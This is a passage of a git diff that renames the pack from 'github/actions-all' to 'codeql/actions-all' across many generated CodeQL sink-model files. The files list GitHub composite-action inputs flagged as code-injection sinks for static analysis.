b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml index 2317aa06ae2e..f0c798160266 100644 --- a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["aws/amazon-vpc-cni-k8s", "*", "input.go-package", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml index baf9c55ff182..5618781b68d6 100644 --- a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["aws/karpenter-provider-aws", "*", "input.account_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml index 583be58ecd26..b1a2d8e4c363 100644 --- a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml +++ b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["awslabs/amazon-eks-ami", "*", "input.max_resource_age_duration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml index e8250232853b..f9b39981ab8f 100644 --- a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml +++ b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["awslabs/aws-lambda-rust-runtime", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml index d3172c566678..1c90c92ca21b 100644 --- a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml +++ b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["azerothcore/azerothcore-wotlk", "*", "input.CXX", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml index 7c1f9dac6bb6..25f194e823a6 100644 --- a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml +++ b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["azure/azure-datafactory", "*", "input.directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml index c77798c10222..2f1481c9c554 100644 --- a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml +++ b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["badges/shields", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml index 3035324bee02..67a1836e8267 100644 --- a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["balena-io/etcher", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml index dd208976fc51..917bd6b03074 100644 --- a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["balena-os/balena-engine", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml index 63f111f3e83c..98190bffee47 100644 --- a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml +++ b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ben-manes/caffeine", "*", "input.attempt-delay", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml index c330ca64c083..4916ce713d7c 100644 --- a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml +++ b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bokeh/bokeh", "*", "input.test-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml index 6b67c69e6e35..e015387a96db 100644 --- a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml +++ b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["botpress/botpress", "*", "input.tilt_cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml index 135bb4baa8be..b9c1ff99ab38 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["braintree/braintree-android-drop-in", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml index c201386cf93f..e8cde1a082f5 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["braintree/braintree/android", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml index 5e39d3f6c5f4..1f5bd390369b 100644 --- a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml +++ b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["broadinstitute/gatk", "*", "input.identifier", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml index 9a9f865b0db4..2097e02a48ae 100644 --- a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml +++ b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["canonical/multipass", "*", "input.release-tag-re", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml index 5c877a87d688..131b59e4f426 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["chia-network/actions", "*", "input.keypair_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml index 6e9e83632904..2b6604f4bce7 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["chia-network/chia-blockchain", "*", "input.command-prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml index f0e62cdaec1a..028fac59db90 100644 --- a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["chipsalliance/chisel", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml index b1158922636e..e188c7fb160c 100644 --- a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml +++ b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["chocobozzz/peertube", "*", "input.deployKey", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml index 78c1a3960566..fe09708380b4 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cilium/cilium-cli", "*", "input.binary-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml index 75c257f39ae7..430d128f1a00 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cilium/cilium", "*", "input.job-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml index 4d19b3ec0af1..ecfd41e15dc8 100644 --- a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml +++ b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["citusdata/citus", "*", "input.flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml index b8bdc7276fbe..b334b14eb37d 100644 --- a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml +++ b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["clerk/javascript", "*", "input.auth-email", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml index 220dbb58e025..936a44a214ba 100644 --- a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cloud-custodian/cloud-custodian", "*", "input.poetry-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml index 1992cbf46967..c116f45a7dfe 100644 --- a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cloudflare/workers-sdk", "*", "input.package-manager", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml index 02c01196842d..f8438e902c6e 100644 --- a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cloudfoundry/cloud_controller/ng", "*", "input.BOSH_CLI_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml index 50af2e33e162..dc392c76263d 100644 --- a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml +++ b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["coder/coder", "*", "input.api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml index 679b362ba3f1..0e7876a64fe4 100644 --- a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml +++ b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["coil-kt/coil", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml index 8e11db68c85e..ccad63033af8 100644 --- a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml +++ b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["commaai/openpilot", "*", "input.sleep_time", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml index deed2d125737..138ced8ab043 100644 --- a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml +++ b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["conan-io/conan-center-index", "*", "input.files", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml index 353cb30683b0..20493280565c 100644 --- a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml +++ b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["corretto/corretto-8", "*", "input.version-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml index 25522a67b69a..a0d3adcc3d2b 100644 --- a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cosmos/cosmos-sdk", "*", "input.github_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml index c545ad6844ef..7db33e6e72c3 100644 --- a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml +++ b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["coturn/coturn", "*", "input.SUDO", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml index 941710eb0fe2..c4fca4427eca 100644 --- a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["crunchydata/postgres-operator", "*", "input.k3s-channel", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml index 75b744fc036b..09d2beb89470 100644 --- a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml +++ b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cvc5/cvc5", "*", "input.build-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml index 7a4ea3514ba4..bd5de74fa09d 100644 --- a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml +++ b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["d2l-ai/d2l-en", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml index 25a25d085ad1..5b46de73fc27 100644 --- a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["danysk/build-check-deploy-gradle-action", "*", "input.clean-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml index 23bd58d66cba..970fd7bc1f13 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-dotnet", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml index 1849ad0e2f56..af46895fa51f 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-go", "*", "input.files", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml index c4861c77842b..98ef93128eb3 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-js", "*", "input.container-id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml index b11931b54086..8d4820efeb70 100644 --- a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["datafuselabs/databend", "*", "input.dataset", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml index 1b3fffbe8693..44f0c6dce8f8 100644 --- a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml +++ b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["davatorium/rofi", "*", "input.logfile", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml index df6f6088087d..d874137e497a 100644 --- a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml +++ b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["debezium/debezium", "*", "input.path-core", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml index 89c10bd95c22..2ec8442b1cf7 100644 --- a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml +++ b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["defenseunicorns/zarf", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml index 4a471b5a97cf..046bb764a1d6 100644 --- a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml +++ b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["demarches-simplifiees/demarches-simplifiees.fr", "*", "input.results_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml index 9f2448a6d752..dcd8a2df02c0 100644 --- a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml +++ b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["department-of-veterans-affairs/vets-website", "*", "input.delimiter", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml index dc8a362dc964..238d675e5b7f 100644 --- a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml +++ b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["devexpress/devextreme", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml index a1f2ccb164e7..c6f83e458bde 100644 --- a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml +++ b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["diggerhq/digger", "*", "input.checkov-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml index 303f9d56cb22..8a10734bd645 100644 --- a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml +++ b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["diku-dk/futhark", "*", "input.script", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml index 2f28cf86431c..770554c8b9df 100644 --- a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml +++ b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["discourse/.github", "*", "input.about_json_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml index efbcceb48f56..fb0631e0bbbb 100644 --- a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml +++ b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dnsjava/dnsjava", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml index 649fac9fede6..caf896bbac3d 100644 --- a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dotintent/react-native-ble-plx", "*", "input.REACT_NATIVE_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml index 3623fe51e843..02917d6da30e 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dotnet/docs-tools", "*", "input.support", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml index d730cdb6a990..17bea3155c5a 100644 --- 